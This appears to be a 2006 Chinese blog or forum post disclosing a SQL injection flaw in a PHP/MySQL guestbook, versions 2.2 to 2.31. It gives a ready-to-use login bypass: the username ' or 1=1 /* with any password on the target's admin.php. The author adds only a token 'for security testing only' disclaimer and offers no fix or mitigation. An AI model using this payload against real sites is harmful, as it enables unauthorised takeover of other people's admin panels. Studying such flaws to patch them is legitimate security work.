鱼子酱 |
2006-01-02 14:01 |
guestbook漏洞公布
guestbook漏洞公布
guestbook基于(php,mysql)2.2版到2.31版的最新sql 注入漏洞公布如下。
通过构造语句可轻松进入管理员后台,有点像当年的asp经典的'or''=', 希望大家不要做坏事,仅供安全检测,一切后果与鱼子酱无关。
攻击方式:
例如: 攻击目标为: http://www.xxxx.com/[guestbook目标]/admin.php
username:' or 1=1 /* password:(任意)(或不填)
哈哈就进去了。。。。 |
|